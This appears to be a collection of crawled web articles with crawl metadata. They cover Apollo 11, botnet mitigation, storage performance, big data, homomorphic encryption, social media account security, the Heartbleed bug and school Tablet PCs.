This story, "NASA doubles commercial fleet after successful Cygnus docking" was originally published by Computerworld. | <urn:uuid:7b292d13-6356-4101-a5cc-6557971bf200> | CC-MAIN-2017-09 | http://www.networkworld.com/article/2170366/data-center/nasa-doubles-commercial-fleet-after-successful-cygnus-docking.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171166.18/warc/CC-MAIN-20170219104611-00649-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.951316 | 750 | 2.734375 | 3 |
On the 20th of this month will be the 40th anniversary of the first Moon landing, Apollo 11, famously taking Neil Armstrong and Buzz Aldrin for man’s first Moon walk. The Lunar Excursion Module (LEM) was fundamentally a simple machine which was designed to fall to the Moon rather than fly, with one giant rocket motor underneath and some smaller attitude thrusters that allowed the spacecraft to be rotated so that the main engine could potentially point in any direction when it fired. Control of the descent was therefore by means of a number of rocket engine “burns” that could slow the fall of the LEM. This certainly is a “brute force” method of flying; as with Earth flying machines like a helicopter or the Harrier jet, if you have a powerful enough engine it’s possible to bludgeon the laws of physics into submission.
Later on (in the late 1970’s), the idea of landing the LEM inspired a series of popular computer games, probably most famously the “Lunar Lander” arcade game from Atari. I first saw versions of lunar lander in the early 1970s, running on programmable calculators, and specifically the Science of Cambridge MK14 (an early single-board microcomputer), the first computer that I ever programmed. In the computer game, the program modelled the amount of fuel in the craft, the altitude and the speed, and of course the moon’s gravitational pull of 1.6N/kg. By pressing a button you could “burn”, which used fuel and slowed descent. If you studied Physics or Applied Maths at school you would have had the formulae needed to create this program, and you could even do the necessary calculations by hand. Where the computer becomes important is in the dynamic nature of the calculations: as you burn fuel, the mass of the craft decreases, and therefore the force of the engine creates more acceleration as the flight continues.
The real LEM had a dry weight of around 4000kg, with another 11,000kg of fuel at the start of the flight, and the descent started from a height of 15km. Unlike the game of course, the Apollo 11 descent had two men’s lives depending on the outcome, and the flight did not go smoothly. Armstrong famously landed the LEM (codenamed “Eagle”) with only a few seconds of fuel left in the tank, after deciding that the landing site was too rocky and deciding to fly along the surface for a while, looking for a new site. If you’ve ever played “Lunar Lander”, you’ll know that flying along at constant height is a very expensive operation in terms of fuel, so this is a high-risk strategy.
The LEM also experienced some computer problems during the short flight, with the Apollo Guidance Computer giving “program alarm 1202” repeatedly, causing Armstrong to ask Mission Control whether he should abort the landing. In subsequent analysis, the experts from MIT concluded that the computer overloaded because of the data coming from both the rendezvous radar and the ground radar at the same time. The boffins imagined that only the ground radar would be on during the descent (to give accurate height readings), while the rendezvous radar would be used after takeoff. Armstrong, being a test pilot, was planning for possible emergencies, and if the landing should be aborted, he wanted to be able to find “Columbia” (the command/service module) as quickly as possible as they burned away from the Moon’s surface. You might say that the user exercised that software in the way that the programmers had not foreseen; a problem that’s still all too common in software engineering today.
I would like to think that with today’s technology it would be much easier to go to the Moon: we have faster , smaller computers; superior materials like plastics and carbon fibre; more sophisticated fuels and engine technologies. Certainly the one thing that hasn’t changed in the last 40 years is the courage that it would take to land on the Moon, and we have to pay tribute to the 12 men that have done it.
For those interested , check this link out http://wechoosethemoon.org/
It recreates the Apollo 11 launch and moonlanding in a real time interactive website to celebrate the 40th anniversary. | <urn:uuid:4d1eff76-8ca2-45e0-b6bd-ec727465292c> | CC-MAIN-2017-09 | http://www.dialogic.com/den/developers/b/developers-blog/archive/2009/07/09/moon-40.aspx | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171629.84/warc/CC-MAIN-20170219104611-00173-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.959341 | 918 | 3.734375 | 4 |
A single malicious botnet can harness enough machines to take down key Internet infrastructure and create financial havoc. Millions of computers on the Internet can be compromised. But there are measures that network managers can take to mitigate these botnet threats, using many of the tools already available to help prevent attacks. Here, Knowledge Center contributor Darren Grabowski discusses the impact of these silent botnet threats and offers solutions that network managers can use to mitigate these botnet threats.
The Internet is in the midst of a global network pandemic, with millions of computers on the Internet compromised in some fashion. It is estimated that the number of recent malware infections on the Internet is over 7 million, and over 70 percent of all e-mail messages are spam. It is also believed that 85 percent of spam comes from just six botnets. It was recently reported that there is an average of ten million active botnet members on any given day, and that botnets are winning the spam war.
These types of high-profile security threats receive significant publicity. However, another threat, a silent one, centers around low-bandwidth consumption, compared to legitimate traffic on a network. A large number of compromised machines, if directed by a malicious botnet, can take down key Internet infrastructure.
The compromised machines can also be used for other harmful activities that could cause a severe financial impact (that is, phishing). According to a recent survey, 3.6 million adults have lost money in phishing schemes, resulting in an estimated loss of $3.2 billion. Phishing is only one part of the problem. Attacks have already caused issues for countries such as Estonia and infrastructure such as the Domain Name System (DNS).
To help mitigate this threat, one of the many tools used is a darknet. According to Team Cymru's Darknet Project
, a darknet is "a portion of routed, allocated IP space in which no active services or servers reside. These are 'dark' because there is, seemingly
, nothing within these networks." In short, there should be no reason for any traffic to enter this space.
Actually, there is one server in a darknet which collects entering packets. This data can be used for immediate action or stored for further analysis. The levels of nefarious traffic from this silent threat are low compared to legitimate traffic, so many network operators may choose to ignore the traffic or they may not even realize the silent threat hiding in their legitimate traffic.
Most users and operators know a problem exists, but few are in a position to see how big the problem is. Solutions are simple: the right tools, dedicated staff and cooperation. Implementation is the most difficult part. Networks large and small must work together to mitigate this threat.
What can be done to mitigate this threat?
We are not going to rid the Internet of compromised machines. That does not mean the problem should be ignored or that we can't mitigate it. What we need to do is reduce the capability of botnets, which means reducing the number of infected machines. Networks of all sizes can assist by properly monitoring their networks and removing infected machines.
Tools exist to monitor traffic at relatively low costs. A darknet, or any other similar monitoring device, allows networks to find potential compromised machines by watching their IP space. Some monitoring devices can be deployed at a relatively low cost using existing hardware or using data from existing intrusion detection systems. Let's look at some solutions:
Solution No. 1: Use scripts and NetFlow data
Using some scripts and NetFlow data, you can monitor your network for activities such as denial of service (DoS) attacks. IP addresses participating in a DoS attack can be investigated a bit further. By combining data from a DoS attack or a darknet and other sources (such as greylisting or spam traps), you can potentially find a botnet member.
Once suspicious hosts are located, you can check to see if these hosts are communicating with a common host-which could be a command-and-control (C&C) server. Taking down a C&C server can disrupt a botnet, even for a short while. If the compromised host's owner can be contacted, there may be a chance that a list of bots can be obtained and further notifications can be sent out. | <urn:uuid:1f321369-1294-4067-a622-24a4b1236cd3> | CC-MAIN-2017-09 | http://www.eweek.com/c/a/Security/How-to-Mitigate-the-Increasing-Botnet-Threat | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171834.68/warc/CC-MAIN-20170219104611-00349-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.940262 | 873 | 2.84375 | 3 |
The problem with that analysis is storage performance isn't as simple as bandwidth alone. In this, the first installment in a three-part series, we'll discuss the basic storage performance metrics: throughput, IOPS and latency. In the second installment we'll cover how you have to consider IOPS and latency together; in part three, we'll look at how RAID affects performance.
We tend to concentrate on storage network bandwidth because it's the only performance metric that's right there in the system specs. When you buy a disk array or HBA, you know if it has 4-Gbps Fibre Channel or 10-Gbps Ethernet connections. Network bandwidth defines the absolute maximum throughput a storage system can deliver, but very few of us run into throughput limits with our mission-critical applications.
Throughput is the limiting factor for applications that read and write data sequentially in large chunks. These include many media applications like video editing or surveillance and, of course, backup. Backup appliance performance is all about how quickly the appliance can ingest one or more streams of data from the backup servers. As a result, backup appliance spec sheets prominently list ingest rates.
So, while throughput is important, other than backup most of us don't have mission-critical applications doing large sequential data transfers. The applications we want to run faster are almost always some sort of database that reads and writes data more or less randomly in 4-Kbyte or 8-kbyte pages. A typical database transaction will require tens or hundreds of small data accesses as the database searches an index for the right record in each affected table, reads the record in, and then writes it back out with new data in the fields that the transaction changed.
For databases and other random-access applications, throughput is much less important than I/O latency and the number of I/O operations per second (IOPS) the storage system can perform.
Latency is simply the amount of time a device takes to store or retrieve data. On a spinning disk, total latency is the seek time plus the rotational latency as the drive waits for the right block of data to come under the heads, plus the data transfer time.
In a real world, storage system latency can be added as requests travel up and down through the server operating system's I/O stack, cross various network switches and work their way through an array's controller. Synchronous mirroring across data centers is a big source of write latency because data has to be written to both the primary and replication target arrays before the write is acknowledged back to the application. Taken together, these often add enough latency to noticeably affect application performance.
Since today's disk drives have just one head positioner, the number of IOPS a drive can deliver is the reciprocal of its latency. So a 15K RPM drive that has an average total latency of 7 milliseconds can deliver 1/0.007 or 140 IOPS.
SSDs and disk arrays can satisfy some I/O requests from their RAM caches and access their multiple flash chips or disk drives in parallel. This parallelism allows them to deliver more IOPS than their latency would imply. Just as parallelism in storage systems reduces the effect of latency on IOPS applications making requests in parallel, a database server satisfying many requests for many users all at the same time can consume more IOPS than if the application was doing all its work sequentially.
So does it make sense to add SSDs to a storage system with 1-Gbps connections? Sure does, if that storage system is going to run a database application like Oracle, MySQL or even Exchange, all of which manage data in small pages. To saturate even one 1-Gbps connection would take 15,000 8K IOPS, while a 12-drive SATA system without SSD would struggle to deliver 1,500.
Now, Steve does have a point that just sticking a bunch of SSDs into a low-end storage system that doesn't have the CPU, memory or proper software to manage them is a fool's errand.
Performance metrics for some basic storage devices:
|Transfer Rate MBps (Read/Write)||Avg Latency ms (Read/Write)||IOPS (Read/Write)|
|10K RPM Disk||168||7.1||140|
|15K RPM Disk||202||5.1||196|
|Micron P400e SATA MLC SSD||350/140||0.5/3.5||50000/7500|
|Micron P320h PCIe SLC SSD||3200/1900||0.009/0.042||785000/205000| | <urn:uuid:199f1ba3-13ca-47bb-bb4a-d33d23fe7ce0> | CC-MAIN-2017-09 | http://www.networkcomputing.com/storage/ssds-and-understanding-storage-performance-metrics/1349951544 | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170696.61/warc/CC-MAIN-20170219104610-00645-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.925815 | 954 | 2.859375 | 3 |
University of Wisconsin geologist Shanan Peters was frustrated by how much he didn’t know.
Most geological discoveries were locked away in troves of research journals so voluminous that he and his colleagues could read only a fraction of them. The sheer magnitude of existing research forced most geologists to limit the scope of their work so they could reasonably grasp what had already been done in the field. Research that received little notice when it was published too often was consigned to oblivion, wasting away in dusty journals, even if it could benefit contemporary scientists.
A decade ago, Peters would have had to accept his field’s human limitations. That’s no longer the case. In the summer of 2012, he teamed up with two University of Wisconsin computer scientists on a project they call GeoDeepDive.
The computer system built by professors Miron Livny and Christopher Re will pore over scanned pages from pre-Internet science journals, generations of websites, archived spreadsheets and video clips to create a database comprising, as nearly as possible, the entire universe of trusted geological data. Ultimately, the system will use contextual clues and technology similar to IBM’s Watson to turn those massive piles of unstructured and often forgotten information—what Livny and Re call “dark data”—into a database that Peters and his colleagues could query with questions such as: How porous is Earth’s crust? How much carbon does it contain? How has that changed over the millennia?
The benefits of GeoDeepDive will be twofold, Peters says. First, it will give researchers a larger collection of data than ever before with which to attack problems in the geosciences. Second, it will allow scientists to broaden their research because they will be able to pose questions to the system that they lack the expertise to answer on their own.
“Some problems were kind of off limits,” Peters says. “You couldn’t really think about reasonably addressing them in a meaningful way in one lifetime. These new tools have that promise—to change the types of questions we’re able to ask and the nature of answers we get.”
Order From Chaos
GeoDeepDive is one of dozens of projects that received funding from a $200 million White House initiative launched in March 2012 to help government agencies, businesses and researchers make better use of what’s called “big data.”
Here’s what that means: Data exist all over the world, in proliferating amounts. Satellites beam back images comprising every square mile of Earth multiple times each day; publishers crank out book after book; and 4.5 million new URLs appear on the Web each month. Electronic sensors record vehicle speeds on the Interstate Highway System, weather conditions in New York’s Central Park and water activity at the bottom of the Indian Ocean. Until recently, scientists, sociologists, journalists and marketers had no way to make sense of all this data. They were like U.S. intelligence agencies before the Sept. 11 terrorist attacks. All the information was there, but no one was able to put it together.
Three things have brought order to that cacophony in recent years. The first is the growth of massive computer clouds that virtually bring together tens or hundreds of thousands of servers and trillions of bytes of processing capacity. The second is a new brand of software that can link hundreds of those computers together so they effectively act like one massive computer with a nearly unlimited hunger for raw data to crunch.
The third element is a vastly improved capacity to sort through unstructured data. That includes information from videos, books, environmental sensors and basically anything else that can’t be neatly organized into a spreadsheet. Then computers can act more like humans, pulling meaning from complex information such as Peters’ geosciences journals without, on the surface at least, reducing it to a series of simple binary questions.
“For a number of years we’ve worked really hard at transforming the information we were collecting into something that computers could understand,” says Sky Bristol, chief of Science Information Services at the U.S. Geological Survey. “We created all these convoluted data structures that sort of made sense to humans but made more sense to computers. What’s happened over the last number of years is that we not only have more powerful computers and better software and algorithms but we’re also able to create data structures that are much more human understandable, that are much more natural to our way of looking at the world.
“The next revolution that’s starting to come,” he says, “is instead of spending a lot of energy turning data into something computers can understand, we can train computers to understand the data and information we humans understand.”
Big data has hit the digital world in a big way. The claims for its power can seem hyperbolic. A recent advertisement for a launch event for the book Big Data: A Revolution That Will Transform How We Live, Work, and Think (Eamon Dolan/Houghton Mifflin Harcourt, 2013) promised the authors would explain why the “revolution” wrought by big data is “on par with the Internet (or perhaps even the printing press).”
Big data’s promise to transform society is real, though. To see its effect one need not look to Guttenberg but to Zuckerberg, Page and Brin. Each day Facebook and Google chew through millions of pages of unstructured text embedded in searches, emails and Facebook feeds to deliver targeted ads that have changed how sellers reach consumers online.
Retailers are mining satellite data to determine what sort of customers are parking in their competitors’ parking lots, when they’re arriving and how long they’re staying. An official with Cisco’s consulting arm recently suggested big box retailers could crunch through security camera recordings of customers’ walking pace, facial expressions and eye movements to determine the optimal placement of impulse purchases or what store temperature is most conducive to selling men’s shoes.
Big data is making an appearance in international aid projects, in historical research and even in literary analysis.
Re, the University of Wisconsin computer scientist, recently teamed with English professor Robin Valenza to build a system similar to GeoDeepDive that crawls through 140,000 books published in the United Kingdom during the 18th century. Valenza is using the tool to investigate how concepts such as romantic love entered the English canon. Ben Schmidt, a Princeton University graduate student in history, has used a similar database built on the Google Books collection to spot linguistic anachronisms in the period TV shows Downton Abbey and Mad Men. His assessment: The Sterling Cooper advertising execs of Mad Men may look dapper in their period suits but they talk about “keeping a low profile” and “focus grouping”—concepts that didn’t enter the language until much later.
The ‘Holy Grail’
The White House’s big data investment was spawned by a 2011 report from the President’s Council of Advisors on Science and Technology, a group of academics and representatives of corporations including Google and Microsoft. The report found private sector and academic researchers were increasingly relying on big data but weren’t doing the sort of basic research and development that could help the field realize its full potential.
The council wasn’t alone. The research arm of McKinsey Global Institute predicted in May 2011 that by 2018 the United States will face a 50 percent to 60 percent gap between demand for big data analysis and the supply of people capable of performing it. The research firm Gartner predicted in December 2011 that 85 percent of Fortune 500 firms will be unprepared to leverage big data for a competitive advantage by 2015.
The White House investment was funneled through the National Science Foundation, the National Institutes of Health, and the Defense and Energy departments, among other agencies. The grants are aimed partly at developing tools for unstructured data analysis in the private, academic and nonprofit worlds but also at improving the way data is gathered, stored and shared in government, says Suzi Iacono, deputy assistant director of the NSF’s Directorate for Computer and Information Science and Engineering.
As an example, Iacono cites the field of emergency management. New data storage and analysis tools are improving the abilities of the National Weather Service, FEMA and other agencies to predict when and how major storms such as Hurricane Sandy are likely to hit the United States. New Web and mobile data tools are making it easier for agencies to share that information during a crisis.
“If we could bring together heterogeneous data about weather models from the past, current weather predictions, data about where people are on the ground, where responders are located— if we could bring all this disparate data together and analyze them to make predictions about evacuation routes, we could actually get people out of harm’s way,” she says. “We could save lives. That’s the Holy Grail.”
One of the largest impacts big data is likely to have on government programs in the near term is by cutting down on waste and fraud, according to a report from the industry group TechAmerica released in May 2012.
The Centers for Medicare and Medicaid Services launched a system in 2011 that crunches through the more than 4 million claims it pays daily to determine the patterns most typical of fraud and possibly deny claims matching those patterns before they’re paid out. The government must pay all Medicare claims within 30 days. Because it lacks the resources to investigate all claims within that window CMS typically has paid claims and then investigated later, an inefficient practice known as “pay and chase.”
The board that tracks spending on President Obama’s 2009 stimulus package used a similar system to weed out nefarious contractors.
Big data is having an impact across government, though, in areas far afield from fraud detection. The data analysis company Modus Operandi received a $1 million Army contract in late 2012 to build a system called Clear Heart, which would dig through hundreds of hours of video—including footage from heavily populated areas—and pick out body movements that suggest what officials call “adversarial intent.” That could mean the posture or hand gestures associated with drawing a gun or planting a roadside bomb or the gait of someone wearing a suicide bombing vest.
The contract covers only the development of the system, not its implementation. But Clear Heart holds clear promise for drone surveillance, Modus Operandi President Richard McNeight says. It could be used to alert analysts to possible dangers or to automatically shed video that doesn’t show adversarial intent, so analysts can better focus their efforts.
The technology also could have domestic applications, McNeight says.
He cites the situation in Newtown, Conn., where a gunman killed 20 elementary school students and six adults. “If you’d had a video camera connected with this system it could have given an early warning that someone was roaming the halls with a gun,” McNeight says.
Big data’s greatest long-term effects are likely to be in the hard sciences, where it has the capacity to change hypothesis-driven research fields into data driven ones. During a panel discussion following the announcement of the White House big data initiative, Johns Hopkins University physics professor Alex Szalay described new computer tools that he and his colleagues are using to run models for testing the big-bang theory.
“There’s just a deluge of data,” the NSF’s Iacono says. “And rather than starting by developing your own hypothesis, now you can do the data analysis first and develop your hypotheses when you’re deeper in.”
Coupled with this shift in how some scientific research is being done is an equally consequential change in who’s doing that research, Iacono says.
“In the old days if you wanted to know what was going on in the Indian Ocean,” she says, “you had to get a boat and get a crew, figure out the right time to go and then you’d come back and analyze your data. For a lot of reasons it was easier for men to do that. But big data democratizes things. Now we’ve got sensors on the whole floor of the Indian Ocean, and you can look at that data every morning, afternoon and night.”
Big data also has democratized the economics of conducting research.
One of NIH’s flagship big data initiatives involves putting information from more than 1,000 individual human genomes inside Amazon’s Elastic Compute Cloud, which stores masses of nonsensitive government information. Amazon is storing the genomes dataset for free. The information consumes about 2,000 terabytes—that’s roughly the capacity required to continuously play MP3 audio files for 380 years—far more storage than most universities or research facilities can afford. The company then charges researchers to analyze the dataset inside its cloud, based on the amount of computing required.
This storage model has opened up research to huge numbers of health and drug researchers, academics and even graduate students who could never have afforded to enter the field before, says Matt Wood, principal data scientist at Amazon Web Services. It has the potential to drastically speed up the development of treatments for diseases such as breast cancer and diabetes.
Over time, Wood says, the project also will broaden the scope of questions those researchers can afford to ask.
“If you rewind seven years, the questions that scientists could ask were constrained by the resources available to them, because they didn’t have half a million dollars to spend on a supercomputer,” he says. “Now we don’t have to worry about arbitrary constraints, so research is significantly accelerated. They don’t have to live with the repercussions of making incorrect assumptions or of running an experiment that didn’t play out.” | <urn:uuid:6ee29b52-fe18-4d6a-8fc8-d4113e2b9664> | CC-MAIN-2017-09 | http://www.nextgov.com/big-data/2013/04/welcome-data-driven-world/62319/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171176.3/warc/CC-MAIN-20170219104611-00345-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.952376 | 2,899 | 2.953125 | 3 |
University researchers have taken an important step forward on cloud security by proving it's possible for a server to process encrypted data and to send back a still-encrypted result.
The technique, developed at the Massachusetts Institute of Technology (MIT), is based on homomorphic encryption, which makes it possible for a cloud server to process data without decryption.
The new method involves stitching homomorphic encryption with two other techniques into what the researchers call a "functional-encryption scheme." The technique is not ready for prime time. The researchers acknowledge that it requires too much computational power to be practical.
Nevertheless, that problem can be attacked over time, now that researchers know it is possible to process data without decryption. "Before, we didn't even know if this was possible," said Raluca Ada Popa, a coauthor of the research and a graduate student in the Department of Electrical Engineering and Computer Science at MIT.
With today's technology, if an encrypted search term is not decrypted first, then the receiving server has no choice but to send back information on every database record it has. As a result, the recipient's computer would then have to do the decryption and handle the computations necessary to determine the applicable results.
Homomorphic encryption, a promising research topic in cryptography, makes it possible to process data while maintaining end-to-end encryption. The researchers' new functional-encryption scheme takes that technology a step further by enabling the cloud server to run a single, specified computation on the homomorphically encrypted result -- such as, "Is this record a match?" -- without having to extract any other information.
To do that, the researchers used two other schemes, called garbled circuit and attribute-based encryption. Each has select capabilities necessary for functional encryption.
The new system begins with homomorphic encryption and embeds the decryption algorithm in a garbled circuit. The key to the garbled circuit is protected in turn by attribute-based encryption, which keeps the whole process encrypted.
Steve Pate, co-founder and chief technology officer for cloud encryption company HighCloud Security, said the new research was "encouraging." But he noted a big stumbleblock: "The computation required for homomorphic encryption far exceeds what we have today in terms of computing resources."
Before such a technique can work, there will need to be advances in hardware where the encryption and key management capabilities occur within the processor or other hardware module, he said.
Andrew Hay, director of applied security research at CloudPassage, said homomorphic encryption is likely to drive security in the future in multi-tenant public cloud environments where servers, applications and processes cannot know each other 's encrypted data. Examples of such environments include Amazon EC2, Google Compute Engine and Rackspace.
Nevertheless, the efficacy of the latest research will not be known until it is tested in production environments. "The theoretical promises of the technology need to be vetted by industry security practitioners, not just by academics," Hay said.
The MIT research was presented last week at the Association for Computing Machinery's 45th Symposium on the Theory of Computing. Joining MIT researches in the work were scientists from the University of Toronto and Microsoft.
This story, "MIT Researchers Advance Cloud Security with End-to-End Encyrption" was originally published by CSO. | <urn:uuid:2f2f7676-d885-4f4d-ad6f-e5f08b0b5536> | CC-MAIN-2017-09 | http://www.cio.com/article/2385080/encryption/mit-researchers-advance-cloud-security-with-end-to-end-encyrption.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171629.92/warc/CC-MAIN-20170219104611-00521-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.931085 | 684 | 3.203125 | 3 |
Phishing attacks -- like the one that may have been behind the recent Twitter AP hoax -- will persist because they work. Social engineering scams will grow more creative in their efforts to con people into coughing up bank account info, network credentials and other sensitive data. And social sites -- all of which are predicated upon words like sharing and connecting -- will be a prime breeding group for such activity, even with tighter perimeter defenses such as two-factor authentication. We're still human, after all, and therefore susceptible to making mistakes.
"Social networking sites can roll out great levels of security," said AVG senior security evangelist Tony Anscombe in an interview. "The problem is at the other end of it, you've got users."
Should you delete your social accounts, unplug your router, throw your phone in the ocean and move off the grid? Keeping your information secure doesn't necessarily require drastic action -- but it does require action. Consider these steps to better protect your social media accounts.
1. You Guessed It: Use Strong Passwords.
It's been said countless times, yet people continue to use things like birthdates or "1234" as passwords. Even worse, they often use the same password across every account they own. That's not good enough. "That is primarily the number-one thing you must do," Anscombe said. Passwords don't have to be random or impossible to remember, but they do need to be tough to crack. "Make it difficult for somebody to socially engineer what [the password] is," Anscombe said.
[ What advice have we gleaned from the recent phishing attack on the Associated Press? Read AP Twitter Hack: Lessons Learned. ]
2. Review Your Apps, Add-Ons and Other Settings.
Anscombe noted that he checked his Twitter account prior to our conversation and was reminded of just how many other applications can gain access to your Twitter account. Yet many people forget to whom else they've granted access, not just on Twitter but on any social site. Take time to review your apps and other add-ons and revoke access from any you don't use or don't remember installing.
"We all download things to try to make it simpler for us, and then we don't use it or use something else," Anscombe said. "What we don't do is ever go back and decline those privileges afterwards."
Among other potential problems: Even when Twitter and other companies roll out two-factor authentication, it doesn't mean the other sites and apps that have access to your data will, too. To review your installed apps in Twitter, just visit Settings and then Apps. The site makes it simple to revoke access from there.
3. Be More Cautious with Mobile.
"Make sure your mobile phone is secure," Anscombe advised, adding that while most PC users these have some form of anti-malware protection in place, many folks don't take the same precaution on their mobile devices. At minimum, use a free security app. (AVG and many of its competitors offer one for Android and other platforms.)
Don't let a security app fool into thinking you've eliminated all risks, though. Anscombe noted, for example, that mobile browsers may make users more susceptible to phishing sites and similar scams. One reason is that mobile screen sizes sometimes make it hard -- or impossible -- to detect irregularities in a browser's URL bar. "The Web browser does that so you get maximum screen vision of the content rather than the address bar, but you don't have the same visual protections," Anscombe said. "They're trying to make it easier for us, but in [doing so] it also loses some of its security as well."
4. Sites Update Privacy Settings -- So Should You.
Regularly review your privacy and other account settings on social sites to ensure they meet your current expectations and needs. Sites regularly revise those settings; users need to as well. Otherwise, you might find your information being used in ways that you're uncomfortable with, Anscombe said.
5. Beware "Password Check" Sites.
Scams often ride on the coattails of other scams. A common one after high-profile breaches: Password-check sites. Paul Ducklin of Sophos noted in a recent blog post that while these sites are sometimes legitimate, they're often cons built to capture your credentials in the wake of other hacks. "That sounds like phishing, doesn't it?" Ducklin wrote. "And the reason it sounds like phishing is that it IS phishing!" Treat such sites with extreme skepticism.
If you're responsible for your employer's corporate Twitter handles and other social media, you should consider tighter controls over those accounts. Anscombe noted that even companies with very restrictive policies governing data security, external communications, content management and similar areas often don't treat their social accounts with the same degree of gravity, exposing themselves to unnecessary risks as a result.
Nate Ulery, who leads the IT infrastructure and operations practice at West Monroe Partners, concurred. Two-factor authentication on Twitter and other sites definitely helps, but don't expect hackers and criminals to simply log off and call it quits.
"While two-factor authentication will help minimize social media hacking risks, companies will need to continue to be vigilant in enforcing their security policies," Ulery said via email interview. "For example, Facebook's standard two-factor authentication is only required when a login occurs on a new computer or mobile phone. Since recognized devices can still access the account without the additional security requirement, malicious software installed on a PC or mobile phone could still potentially expose the social media account." | <urn:uuid:b74b7b91-7757-4eb8-8257-5e9524ccdad8> | CC-MAIN-2017-09 | http://www.networkcomputing.com/government/twitter-trouble-9-social-media-security-tips/1591868953?cid=rssfeed_iwk_authors | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501174154.34/warc/CC-MAIN-20170219104614-00397-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.953177 | 1,161 | 2.6875 | 3 |
What is phishing? – in the cyber world, phishing is a serious crime and that can be referred to as online fraud. This sin is made in the form of online attacks with the help of forged e-mails and counterfeit websites in order to obtain the confidential and sensitive information of those who are involved in online correspondence and transactions etc. In case of fake websites, these are copycat in designing and other features of any reputable organization’s original site. Such as, a bank website can be used in this concern by Phishers to prepare its copy. | <urn:uuid:16c64bf2-be66-46d4-a7f3-003d69df4069> | CC-MAIN-2017-09 | https://howdoesinternetwork.com/tag/counterfeit-websites | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171632.91/warc/CC-MAIN-20170219104611-00217-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.959478 | 114 | 3.078125 | 3 |
No matter how hard you try to stay safe, some aspects of securing your online data are completely out of your hands. That fact was made painfully obvious on Monday, when the Internet got caught with its collective pants down thanks to a critical vulnerability affecting a fundamental tool for secure online communications.
Called Heartbleed, the bug has been in the wild for more than two years now. It allows attackers to exploit a critical programming flaw in OpenSSL--an open source implementation of the SSL/TLS encryption protocol.A
+ Also on NetworkWorld: Worst Data Breaches of 2014 so far +
When exploited, the flaw leaks data from a server's memory, which could include SSL site keys, usernames and passwords, and even personal user data such as email, instant messages, and files, according to Finland-based Codenomicon, the security firm that first uncovered Heartbleed in concert with a Google researcher.
That's bad. Real bad, though it's important to note that Heartbleed only affects OpenSSL and not the security protocol itself.
But due to OpenSSL's popularity with website administrators, the potential number of affected websites is huge. Security and Internet research firm Netcraft estimates that Heartbleed affects around half a million "widely trusted websites."
Yahoo has already said it was hit by the Heartbleed bug and Yahoo-owned Tumblr is advising users to update their passwords ASAP.
"On the scale of 1 to 10, this [Heartbleed] is an 11," respected security expert Bruce Schneier said on his blog.
Yes, this bug is pretty serious and almost certainly affects at least one of your online accounts. But now that we've got the scary stuff out of the way, let's talk about some of the practical measures you need to know about.A
Keep calm and...
Thanks to Hearbleed it's possible that some unscrupulous actors online could have your username and password. And you should definitely change your password on any site that says it was affected.
But here's the thing: While OpenSSL already has a fix available, changing your username and password before a site patches its servers achieves nothing. In fact, it could make things worse.A
"You should change password after the service provider has patched their site. Otherwise you just contribute to the data that can be stolen," Codenomicon spokesperson Ari Takanen told us via email.
...don't carry on
Heartbleed was publicized on Monday. So by now, many sites should have scrambled (or are scrambling) to patch their servers. You can find out if a site is still affected by Heartbleed using online checkers provided by LastPass, Qualsys, or Filippo Valsorda.
If you find that a site you use often is still affected by the vulnerability, Codenomicon advises to take a "day off" from that site. Heartbleed only exposes data that's held in a server's memory (RAM). This isn't a break-in and read the database type flaw. Your data needs to be in a server's memory when it's attacked to be exposed.A
That's one reason why changing your password before a site is patched could actually be worse than doing nothing, especially now that Heartbleed is public knowledge.
Security flaws like this are also a good time for some reminders about how best to secure your online accounts.A
You should really be using two-factor authentication for all your accounts that offer it.A Two-factor authentication requires you to enter an extra code before accessing your online accounts. The code is typically generated by a smartphone app or keychain dongle, but you can also receive codes to your phone via SMS.
This extra step requires attackers to know how to generate your two-factor authentication code before they can login to your account. In the case of Heartbleed, two-factor authentication may not have been as useful a defense, but in general this extra step helps keep your account safer than it was.
Use a password manager
Now's a good time to start using a password manager especially if you're going to be changing some user logins over the next few days. A password manager makes it easy to generate randomized passwords using a combination of letters, numbers, and special characters. It also relieves you of having to memorize every one of those overly complex codes.
Password managers often come with other features as well such as secure notes, and autofill for online forms.
There are many options out there for password managers, but some of our favorites include LastPass, Dashlane, and KeePass. LastPass recently said in a blog post that it was using the version of OpenSSL affected by Heartbleed; however, because the service encrypts your data before transmitting it online, the company says its users were not at risk of having their data exposed to the bad guys.
Heartbleed is certainly a nasty little bug that needs to be taken seriously. But considering it's been in the wild for more than two years, there's not much a user can do now except wait patiently for affected sites to patch their servers before changing any passwords.
Once those sites are patched, however, you'll want to change your password as soon as possible.
This story, "The critical, widespread Heartbleed bug and you: How to keep your private info safe" was originally published by PCWorld. | <urn:uuid:33ebf3a6-60ee-4ffb-8fb6-259f2c91f751> | CC-MAIN-2017-09 | http://www.networkworld.com/article/2175981/lan-wan/the-critical--widespread-heartbleed-bug-and-you--how-to-keep-your-private-info-safe.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170794.46/warc/CC-MAIN-20170219104610-00037-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.959406 | 1,116 | 2.75 | 3 |
Illinois school district uses Toshiba Tablet PCs to facilitate teacher-student collaboration.
By bringing Tablet PCs and wireless projectors into its classrooms, Hinsdale Township Public High School District 86 is revolutionizing teaching in Illinois.
It was nearly eight years ago that the schools mobile computing vision started taking form, but it wasnt until last year, during a Tablet PC presentation by Microsoft Corp. and Toshiba America Inc., that the school found the perfect fit.
